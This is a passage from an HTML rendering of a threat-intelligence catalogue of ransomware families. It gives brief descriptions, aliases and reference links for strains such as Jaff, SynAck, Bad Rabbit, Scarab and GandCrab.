<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/russianRansom.html">http://www.nyxbone.com/malware/russianRansom.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zorro"><a class="anchor" href="#_zorro"></a><a class="link" href="#_zorro">Zorro</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2138. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/844538370323812353">https://twitter.com/BleepinComputer/status/844538370323812353</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zyklon"><a class="anchor" href="#_zyklon"></a><a class="link" href="#_zyklon">Zyklon</a></h3>
<div class="paragraph">
<p>Ransomware Hidden Tear family, GNL Locker variant</p>
</div>
<div class="paragraph">
<p>Zyklon is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>GNL Locker</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_vxlock"><a class="anchor" href="#_vxlock"></a><a class="link" href="#_vxlock">vxLock</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_jaff"><a class="anchor" href="#_jaff"></a><a class="link" href="#_jaff">Jaff</a></h3>
<div class="paragraph">
<p>We recently observed several large scale email campaigns that were attempting to distribute a new variant of ransomware that has been dubbed "Jaff". Interestingly we identified several characteristics that we have previously observed being used during Dridex and Locky campaigns. In a short period of time, we observed multiple campaigns featuring high volumes of malicious spam emails being distributed, each using a PDF attachment with an embedded Microsoft Word document functioning as the initial downloader for the Jaff ransomware.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2139. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintelligence.com/2017/05/jaff-ransomware.html">http://blog.talosintelligence.com/2017/05/jaff-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/jaff-ransomware-distributed-via-necurs-malspam-and-asking-for-a-3-700-ransom/">https://www.bleepingcomputer.com/news/security/jaff-ransomware-distributed-via-necurs-malspam-and-asking-for-a-3-700-ransom/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uiwix_ransomware"><a class="anchor" href="#_uiwix_ransomware"></a><a class="link" href="#_uiwix_ransomware">Uiwix Ransomware</a></h3>
<div class="paragraph">
<p>Using EternalBlue SMB Exploit To Infect Victims</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2140. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/uiwix-ransomware-using-eternalblue-smb-exploit-to-infect-victims/">https://www.bleepingcomputer.com/news/security/uiwix-ransomware-using-eternalblue-smb-exploit-to-infect-victims/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sorebrect"><a class="anchor" href="#_sorebrect"></a><a class="link" href="#_sorebrect">SOREBRECT</a></h3>
<div class="paragraph">
<p>Fileless, Code-injecting Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2141. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-fileless-code-injecting-sorebrect-ransomware/">http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-fileless-code-injecting-sorebrect-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cyron"><a class="anchor" href="#_cyron"></a><a class="link" href="#_cyron">Cyron</a></h3>
<div class="paragraph">
<p>claims it detected "Children Pornsites" in your browser history</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2142. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/899524853426008064">https://twitter.com/struppigel/status/899524853426008064</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kappa"><a class="anchor" href="#_kappa"></a><a class="link" href="#_kappa">Kappa</a></h3>
<div class="paragraph">
<p>Made with OXAR builder; decryptable</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2143. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/899528477824700416">https://twitter.com/struppigel/status/899528477824700416</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trojan_dz"><a class="anchor" href="#_trojan_dz"></a><a class="link" href="#_trojan_dz">Trojan Dz</a></h3>
<div class="paragraph">
<p>CyberSplitter variant</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2144. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/899537940539478016">https://twitter.com/struppigel/status/899537940539478016</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xolzsec"><a class="anchor" href="#_xolzsec"></a><a class="link" href="#_xolzsec">Xolzsec</a></h3>
<div class="paragraph">
<p>ransomware written by self proclaimed script kiddies that should really be considered trollware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2145. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/899916577252028416">https://twitter.com/struppigel/status/899916577252028416</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_flatchestware"><a class="anchor" href="#_flatchestware"></a><a class="link" href="#_flatchestware">FlatChestWare</a></h3>
<div class="paragraph">
<p>HiddenTear variant; decryptable</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2146. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/900238572409823232">https://twitter.com/struppigel/status/900238572409823232</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_synack"><a class="anchor" href="#_synack"></a><a class="link" href="#_synack">SynAck</a></h3>
<div class="paragraph">
<p>The ransomware does not use a customized desktop wallpaper to signal its presence, and the only way to discover that SynAck has infected your PC is by the ransom notes dropped on the user&#8217;s desktop, named in the format: RESTORE_INFO-[id].txt. For example: RESTORE_INFO-4ABFA0EF.txt
In addition, SynAck also appends its own extension at the end of all files it encrypted. This file extensions format is ten random alpha characters for each file. For example: test.jpg.XbMiJQiuoh. Experts believe the group behind SynAck uses RDP brute-force attacks to access remote computers and manually download and install the ransomware.</p>
</div>
<div class="paragraph">
<p>SynAck is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Syn Ack</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2147. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/synack-ransomware-sees-huge-spike-in-activity/">https://www.bleepingcomputer.com/news/security/synack-ransomware-sees-huge-spike-in-activity/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_synccrypt"><a class="anchor" href="#_synccrypt"></a><a class="link" href="#_synccrypt">SyncCrypt</a></h3>
<div class="paragraph">
<p>A new ransomware called SyncCrypt was discovered by Emsisoft security researcher xXToffeeXx that is being distributed by spam attachments containing WSF files. When installed these attachments will encrypt a computer and append the .kk extension to encrypted files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2148. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/">https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bad_rabbit"><a class="anchor" href="#_bad_rabbit"></a><a class="link" href="#_bad_rabbit">Bad Rabbit</a></h3>
<div class="paragraph">
<p>On October 24, 2017, Cisco Talos was alerted to a widescale ransomware campaign affecting organizations across eastern Europe and Russia. As was the case in previous situations, we quickly mobilized to assess the situation and ensure that customers remain protected from this and other threats as they emerge across the threat landscape. There have been several large scale ransomware campaigns over the last several months. This appears to have some similarities to Nyetya in that it is also based on Petya ransomware. Major portions of the code appear to have been rewritten. The distribution does not appear to have the sophistication of the supply chain attacks we have seen recently.</p>
</div>
<div class="paragraph">
<p>Bad Rabbit is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BadRabbit</p>
</li>
<li>
<p>Bad-Rabbit</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2149. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintelligence.com/2017/10/bad-rabbit.html">http://blog.talosintelligence.com/2017/10/bad-rabbit.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_halloware"><a class="anchor" href="#_halloware"></a><a class="link" href="#_halloware">Halloware</a></h3>
<div class="paragraph">
<p>A malware author by the name of Luc1F3R is peddling a new ransomware strain called Halloware for the lowly price of $40. Based on evidence gathered by Bleeping Computer, Luc1F3R started selling his ransomware this week, beginning Thursday.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2150. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/halloware-ransomware-on-sale-on-the-dark-web-for-only-40/">https://www.bleepingcomputer.com/news/security/halloware-ransomware-on-sale-on-the-dark-web-for-only-40/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_storagecrypt"><a class="anchor" href="#_storagecrypt"></a><a class="link" href="#_storagecrypt">StorageCrypt</a></h3>
<div class="paragraph">
<p>Recently BleepingComputer has received a flurry of support requests for a new ransomware being named StorageCrypt that is targeting NAS devices such as the Western Digital My Cloud. Victims have been reporting that their files have been encrypted and a note left with a ransom demand of between .4 and 2 bitcoins to get their files back. User&#8217;s have also reported that each share on their NAS device contains a Autorun.inf file and a Windows executable named 美女与野兽.exe, which translates to Beauty and the beast. From the samples BleepingComputer has received, this Autorun.inf is an attempt to spread the 美女与野兽.exe file to other computers that open the folders on the NAS devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2151. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/storagecrypt-ransomware-infecting-nas-devices-using-sambacry/">https://www.bleepingcomputer.com/news/security/storagecrypt-ransomware-infecting-nas-devices-using-sambacry/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hc7"><a class="anchor" href="#_hc7"></a><a class="link" href="#_hc7">HC7</a></h3>
<div class="paragraph">
<p>A new ransomware called HC7 is infecting victims by hacking into Windows computers that are running publicly accessible Remote Desktop services. Once the developers gain access to the hacked computer, the HC7 ransomware is then installed on all accessible computers on the network.
Originally released as HC6, victims began posting about it in the BleepingComputer forums towards the end of November. As this is a Python-to-exe executable, once the script was extracted ID Ransomware creator Michael Gillespie was able determine that it was decryptable and released a decryptor.
Unfortunately, a few days later, the ransomware developers released a new version called HC7 that was not decryptable. Thi sis because they removed the hard coded encryption key and instead switched to inputting the key as a command line argument when the attackers run the ransomware executable. Thankfully, there may be a way to get around that as well so that victims can recover their keys.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2152. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/hc7-gotya-ransomware-installed-via-remote-desktop-services-spread-with-psexec/">https://www.bleepingcomputer.com/news/security/hc7-gotya-ransomware-installed-via-remote-desktop-services-spread-with-psexec/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hc6"><a class="anchor" href="#_hc6"></a><a class="link" href="#_hc6">HC6</a></h3>
<div class="paragraph">
<p>Predecessor of HC7</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2153. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/935622942737817601?ref_src=twsrc%5Etfw">https://twitter.com/demonslay335/status/935622942737817601?ref_src=twsrc%5Etfw</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/hc7-gotya-ransomware-installed-via-remote-desktop-services-spread-with-psexec/">https://www.bleepingcomputer.com/news/security/hc7-gotya-ransomware-installed-via-remote-desktop-services-spread-with-psexec/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_qkg"><a class="anchor" href="#_qkg"></a><a class="link" href="#_qkg">qkG</a></h3>
<div class="paragraph">
<p>Security researchers have discovered a new ransomware strain named qkG that targets only Office documents for encryption and infects the Word default document template to propagate to new Word documents opened through the same Office suite on the same computer.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2154. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/qkg-ransomware-encrypts-only-word-documents-hides-and-spreads-via-macros/">https://www.bleepingcomputer.com/news/security/qkg-ransomware-encrypts-only-word-documents-hides-and-spreads-via-macros/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scarab"><a class="anchor" href="#_scarab"></a><a class="link" href="#_scarab">Scarab</a></h3>
<div class="paragraph">
<p>The Scarab ransomware is a relatively new ransomware strain that was first spotted by security researcher Michael Gillespie in June this year.
Written in Delphi, the first version was simplistic and was recognizable via the ".scarab" extension it appended after the names of encrypted files.
Malwarebytes researcher Marcelo Rivera spotted a second version in July that used the ".scorpio" extension. The version spotted with the Necurs spam today has reverted back to using the .scarab extension.
The current version of Scarab encrypts files but does not change original file names as previous versions. This Scarab version appends each file&#8217;s name with the ".[<a href="mailto:suupport@protonmail.com">suupport@protonmail.com</a>].scarab" extension.
Scarab also deletes shadow volume copies and drops a ransom note named "IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT" on users' computers, which it opens immediately.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2155. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/scarab-ransomware-pushed-via-massive-spam-campaign/">https://www.bleepingcomputer.com/news/security/scarab-ransomware-pushed-via-massive-spam-campaign/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labsblog.f-secure.com/2017/11/23/necurs-business-is-booming-in-a-new-partnership-with-scarab-ransomware/">https://labsblog.f-secure.com/2017/11/23/necurs-business-is-booming-in-a-new-partnership-with-scarab-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.forcepoint.com/security-labs/massive-email-campaign-spreads-scarab-ransomware">https://blogs.forcepoint.com/security-labs/massive-email-campaign-spreads-scarab-ransomware</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/933643147766321152">https://twitter.com/malwrhunterteam/status/933643147766321152</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://myonlinesecurity.co.uk/necurs-botnet-malspam-delivering-a-new-ransomware-via-fake-scanner-copier-messages/">https://myonlinesecurity.co.uk/necurs-botnet-malspam-delivering-a-new-ransomware-via-fake-scanner-copier-messages/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_file_spider"><a class="anchor" href="#_file_spider"></a><a class="link" href="#_file_spider">File Spider</a></h3>
<div class="paragraph">
<p>A new ransomware called File Spider is being distributed through spam that targets victims in Bosnia and Herzegovina, Serbia, and Croatia. These spam emails contains malicious Word documents that will download and install the File Spider ransomware onto a victims computer.File Spider is currently being distributed through malspam that appears to be targeting countries such as Croatia, Bosnia and Herzegovina, and Serbia. The spam start with subjects like"Potrazivanje dugovanja", which translates to "Debt Collection" and whose message, according to Google Translate, appear to be in Serbian.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2156. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/file-spider-ransomware-targeting-the-balkans-with-malspam/">https://www.bleepingcomputer.com/news/security/file-spider-ransomware-targeting-the-balkans-with-malspam/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_filecoder"><a class="anchor" href="#_filecoder"></a><a class="link" href="#_filecoder">FileCoder</a></h3>
<div class="paragraph">
<p>A barely functional piece of macOS ransomware, written in Swift.</p>
</div>
<div class="paragraph">
<p>FileCoder is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FindZip</p>
</li>
<li>
<p>Patcher</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2157. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://objective-see.com/blog/blog_0x25.html#FileCoder">https://objective-see.com/blog/blog_0x25.html#FileCoder</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_macransom"><a class="anchor" href="#_macransom"></a><a class="link" href="#_macransom">MacRansom</a></h3>
<div class="paragraph">
<p>A basic piece of macOS ransomware, offered via a 'malware-as-a-service' model.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2158. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://objective-see.com/blog/blog_0x25.html">https://objective-see.com/blog/blog_0x25.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gandcrab"><a class="anchor" href="#_gandcrab"></a><a class="link" href="#_gandcrab">GandCrab</a></h3>
<div class="paragraph">
<p>A new ransomware called GandCrab was released towards the end of last week that is currently being distributed via exploit kits. GandCrab has some interesting features not seen before in a ransomware, such as being the first to accept the DASH currency and the first to utilize the Namecoin powered .BIT tld.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2159. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/">https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/">https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-version-2-released-with-new-crab-extension-and-other-changes/">https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-version-2-released-with-new-crab-extension-and-other-changes/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shurl0ckr"><a class="anchor" href="#_shurl0ckr"></a><a class="link" href="#_shurl0ckr">ShurL0ckr</a></h3>
<div class="paragraph">
<p>Security researchers uncovered a new ransomware named ShurL0ckr (detected by Trend Micro as RANSOM_GOSHIFR.B) that reportedly bypasses detection mechanisms of cloud platforms. Like Cerber and Satan, ShurL0ckrs operators further monetize the ransomware by peddling it as a turnkey service to fellow cybercriminals, allowing them to earn additional income through a commission from each victim who pays the ransom.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2160. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications">https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryakl"><a class="anchor" href="#_cryakl"></a><a class="link" href="#_cryakl">Cryakl</a></h3>
<div class="paragraph">
<p>ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2161. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://sensorstechforum.com/fr/fairytail-files-virus-cryakl-ransomware-remove-restore-data/">https://sensorstechforum.com/fr/fairytail-files-virus-cryakl-ransomware-remove-restore-data/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.technologynews.tech/cryakl-ransomware-virus">https://www.technologynews.tech/cryakl-ransomware-virus</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.zdnet.com/article/cryakl-ransomware-decryption-keys-now-available-for-free/">http://www.zdnet.com/article/cryakl-ransomware-decryption-keys-now-available-for-free/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_thanatos"><a class="anchor" href="#_thanatos"></a><a class="link" href="#_thanatos">Thanatos</a></h3>
<div class="paragraph">
<p>first ransomware seen to ask for payment to be made in Bitcoin Cash (BCH)</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2162. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://mobile.twitter.com/EclecticIQ/status/968478323889332226">https://mobile.twitter.com/EclecticIQ/status/968478323889332226</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.eclecticiq.com/resources/thanatos&#8212;&#8203;ransomware-first-ransomware-ask-payment-bitcoin-cash?type=intel-report">https://www.eclecticiq.com/resources/thanatos&#8212;&#8203;ransomware-first-ransomware-ask-payment-bitcoin-cash?type=intel-report</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rsautil"><a class="anchor" href="#_rsautil"></a><a class="link" href="#_rsautil">RSAUtil</a></h3>
<div class="paragraph">
<p>RSAUtil is distributed by the developer hacking into remote desktop services and uploading a package of files. This package contains a variety of tools, a config file that determines how the ransomware executes, and the ransomware itself.</p>
</div>
<div class="paragraph">
<p>RSAUtil is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Vagger</p>
</li>
<li>
<p>DONTSLIP</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2163. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.securityweek.com/rsautil-ransomware-distributed-rdp-attacks">https://www.securityweek.com/rsautil-ransomware-distributed-rdp-attacks</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/rsautil-ransomware-helppme-india-com-installed-via-hacked-remote-desktop-services/">https://www.bleepingcomputer.com/news/security/rsautil-ransomware-helppme-india-com-installed-via-hacked-remote-desktop-services/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://id-ransomware.blogspot.lu/2017/04/rsautil-ransomware.html">http://id-ransomware.blogspot.lu/2017/04/rsautil-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://id-ransomware.blogspot.lu/2017/04/">http://id-ransomware.blogspot.lu/2017/04/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_qwerty_ransomware"><a class="anchor" href="#_qwerty_ransomware"></a><a class="link" href="#_qwerty_ransomware">Qwerty Ransomware</a></h3>
<div class="paragraph">
<p>A new ransomware has been discovered that utilizes the legitimate GnuPG, or GPG, encryption program to encrypt a victim&#8217;s files. Currently in the wild, this ransomware is called Qwerty Ransomware and will encrypt a victims files, overwrite the originals, and the append the .qwerty extension to an encrypted file&#8217;s name.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2164. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/qwerty-ransomware-utilizes-gnupg-to-encrypt-a-victims-files/">https://www.bleepingcomputer.com/news/security/qwerty-ransomware-utilizes-gnupg-to-encrypt-a-victims-files/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zenis_ransomware"><a class="anchor" href="#_zenis_ransomware"></a><a class="link" href="#_zenis_ransomware">Zenis Ransomware</a></h3>
<div class="paragraph">
<p>A new ransomware was discovered this week by MalwareHunterTeam called Zenis Ransomware. While it is currently unknown how Zenis is being distributed, multiple victims have already become infected with this ransomware. What is most disturbing about Zenis is that it not encrypts your files, but also purposely deletes your backups.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2165. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
